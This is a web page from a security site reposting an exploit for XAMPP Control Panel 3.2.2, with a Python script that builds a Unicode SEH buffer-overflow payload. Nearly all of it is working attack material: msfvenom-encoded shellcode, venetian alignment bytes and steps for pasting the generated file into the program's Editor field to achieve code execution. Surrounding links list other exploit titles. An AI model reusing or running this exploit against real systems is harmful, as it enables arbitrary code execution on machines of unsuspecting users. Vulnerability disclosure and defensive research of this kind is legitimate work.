首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
XAMPP Control Panel 3.2.2 - Buffer Overflow (SEH) (Unicode)
来源:vfocus.net 作者:Lyhin 发布时间:2018-11-14  
# Exploit Title: XAMPP Control Panel 3.2.2 - Buffer Overflow (SEH) (Unicode)
# Exploit Author: Gionathan "John" Reale (0-day DoS exploit), Semen Alexandrovich Lyhin (1-day fully working exploit).
# Shellcode Author: Giuseppe D'Amore (EDB:28996)
# Date: 2018-11-08.
# Software: XAMPP
# Version: 3.2.2 / 7.2.9 (Newest version at time of writing)
# Download: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/7.2.9/xampp-portable-win32-7.2.9-0-VC15-installer.exe/download
# Tested on: Windows 10 64bit with XAMPP 32bit. Should work on any Windows since XP.
 
# Special thanks to Deloitte Ukraine for providing a few payed hours to create this exploit.
 
# Steps to Reproduce:
# Run the python exploit script, it will create a new file with the name "exploit.txt".
# Copy the contents of "exploit.txt"
# Start the program and click "Config (Top Right With Symbol)"
# Paste the contents of "exploit.txt" into the following field: "Editor".
# Click "Save" and then in the main window Click "Config" > "Apache (httpd.conf)".
# You will see that arbitrary code is executed. It should pop a messagebox.
 
#cat 28996.bin | msfvenom -p - -a x86 --platform win -f py  -e x86/unicode_mixed BufferRegister=EAX
#Length is 352, but double it.
 
buf =  ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x50\x31\x4a\x32\x68\x32"
buf += "\x50\x30\x61\x54\x34\x4b\x4a\x72\x74\x4b\x72\x32\x6a"
buf += "\x6c\x44\x4b\x4e\x72\x4d\x4c\x62\x6b\x4d\x72\x79\x78"
buf += "\x62\x6b\x31\x62\x4d\x50\x34\x4b\x4b\x62\x31\x70\x51"
buf += "\x6e\x6a\x6c\x50\x33\x62\x55\x68\x72\x75\x39\x69\x37"
buf += "\x4a\x63\x51\x68\x6f\x4c\x52\x6b\x4f\x67\x44\x38\x4a"
buf += "\x61\x45\x72\x52\x6b\x33\x4a\x4f\x30\x7a\x61\x77\x57"
buf += "\x4e\x51\x38\x6d\x64\x4b\x4d\x64\x74\x6f\x4a\x61\x36"
buf += "\x66\x70\x45\x42\x61\x6d\x6e\x4e\x66\x43\x31\x64\x34"
buf += "\x50\x61\x72\x55\x58\x72\x32\x61\x53\x4e\x49\x78\x6f"
buf += "\x55\x51\x68\x32\x49\x53\x44\x32\x55\x57\x79\x52\x6b"
buf += "\x53\x4a\x6f\x34\x4a\x61\x55\x77\x6f\x76\x62\x6b\x6e"
buf += "\x4c\x50\x6f\x54\x4b\x51\x6a\x6d\x4c\x6d\x31\x36\x67"
buf += "\x42\x6b\x63\x4c\x36\x4f\x79\x6c\x39\x71\x37\x57\x72"
buf += "\x48\x4d\x75\x4f\x54\x4f\x31\x6b\x51\x33\x38\x30\x4c"
buf += "\x6e\x6f\x71\x39\x4e\x74\x50\x68\x6b\x70\x51\x35\x6f"
buf += "\x68\x42\x30\x71\x79\x69\x51\x59\x6e\x70\x49\x5a\x6b"
buf += "\x4c\x71\x47\x50\x4e\x71\x62\x30\x69\x6f\x59\x47\x41"
buf += "\x41"
 
# venetian padding
 
ven = "\x53"            #push esi
ven += "\x43"           #align
ven += "\x58"           #pop eax
ven += "\x43"           #align
ven += "\x05\x50\x11"   #add eax,11005000
ven += "\x43"           #align
ven += "\x2d\x1c\x11"   #sub eax,33001700
ven += "\x43"           #align
ven += "\x48"           #dec eax
ven += "\x43"           #align
ven += "\x43"*2         #nops
 
payload = "\x43"*270 + "\x37\x53" + ven + buf + "\x43" * (6000 - 2 - 270 - len(ven+buf))
 
try:
    f=open("exploit.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Evince 3.24.0 - Command Inject
·Cisco Immunet < 6.2.0 / Cisco
·CuteFTP Mac 3.1 - Denial of Se
·xorg-x11-server < 1.20.1 - Loc
·Mongoose Web Server 6.9 - Deni
·ntpd 4.2.8p10 - Out-of-Bounds
·CuteFTP 9.3.0.3 - Denial of Se
·AMPPS 2.7 - Denial of Service
·TP-Link Archer C50 Wireless Ro
·Atlassian Jira Authenticated U
·HeidiSQL 9.5.0.5196 - Denial o
·SwitchVPN for macOS 2.1012.03
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved